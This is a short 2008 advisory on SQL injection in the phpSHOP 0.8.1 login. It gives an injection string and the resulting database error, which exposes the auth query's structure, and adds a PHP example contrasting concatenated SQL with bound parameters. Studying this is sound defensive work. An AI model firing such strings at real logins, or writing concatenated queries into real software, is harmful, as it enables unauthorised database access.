phpSHOP 0.8.1 SQL Injection Vulnerability

[+]———————————————-[+]

phpSHOP 0.8.1 SQL Injection
[+]———————————————-[+]
author: y2h4ck
e-mail: y2h4ck[ at ] gmail.com
page: https://y2h4ck.wordpress.com
[+]———————————————-[+]
Vuln script: http://shop/0.8.1/?login=1&&
String: /?login='1==1' select --
The login/password input boxes accept SQL injection strings, which lets you manipulate
the behavior of the MySQL queries that phpSHOP issues.
Result:
[+]———————————————-[+]
Database error: Invalid SQL: SELECT * from auth_user_md5,user_info WHERE auth_user_md5.username =''1==1' select --' AND auth_user_md5.password ='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.password ='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.user_id = user_info.user_id AND user_info.address_type = 'BT'

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1==1' select --' AND auth_user_md5.password ='d41d8cd98f00b204e9800998ecf8427e'A' at line 1)

[+]———————————————-[+]

Version: 0.8.1
Vendor : www.phpshop.org

Date: 14/02/2008

[+]———————————————-[+]
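
The error above shows the login value landing inside the SQL text. The following is an added example, not phpSHOP source and not part of the original advisory: it rebuilds the same query shape once by concatenation and once with bound parameters. The function names, the sample account and the use of in-memory SQLite in place of MySQL are assumptions.

```php
<?php
// Added example, not phpSHOP source. Function names and the sample account are
// assumptions; in-memory SQLite stands in for MySQL so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE auth_user_md5 (user_id INTEGER, username TEXT, password TEXT)");
$db->exec("CREATE TABLE user_info (user_id INTEGER, address_type TEXT)");
// Constructed account; MD5 only mirrors the column layout visible in the error.
$db->exec("INSERT INTO auth_user_md5 VALUES (1, 'alice', '" . md5('s3cret') . "')");
$db->exec("INSERT INTO user_info VALUES (1, 'BT')");

const JOIN_TAIL = " AND auth_user_md5.user_id = user_info.user_id"
                . " AND user_info.address_type = 'BT'";

// Concatenated form: the input becomes part of the SQL text itself.
function login_concat(PDO $db, string $user, string $pass): string
{
    $sql = "SELECT * FROM auth_user_md5, user_info"
         . " WHERE auth_user_md5.username = '" . $user . "'"
         . " AND auth_user_md5.password = '" . md5($pass) . "'" . JOIN_TAIL;
    try {
        return $db->query($sql)->fetch() ? 'ok' : 'denied';
    } catch (PDOException $e) {
        return 'sql error'; // the parser treated user input as SQL
    }
}

// Bound form: the statement text is fixed and input travels only as data.
function login_bound(PDO $db, string $user, string $pass): string
{
    $stmt = $db->prepare("SELECT * FROM auth_user_md5, user_info"
        . " WHERE auth_user_md5.username = ? AND auth_user_md5.password = ?" . JOIN_TAIL);
    $stmt->execute([$user, md5($pass)]);
    return $stmt->fetch() ? 'ok' : 'denied';
}

$cases = [
    ['alice', 's3cret'],            // valid login
    ['alice', 'wrong'],             // bad password
    ["'1==1' select --", ''],       // string from the advisory, empty password
];
foreach ($cases as [$u, $p]) {
    printf("%-18s concat=%-9s bound=%s\n", $u, login_concat($db, $u, $p), login_bound($db, $u, $p));
}
```

With the advisory's string, the concatenated query fails to parse, while the bound query treats it as an unknown username and returns no row.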
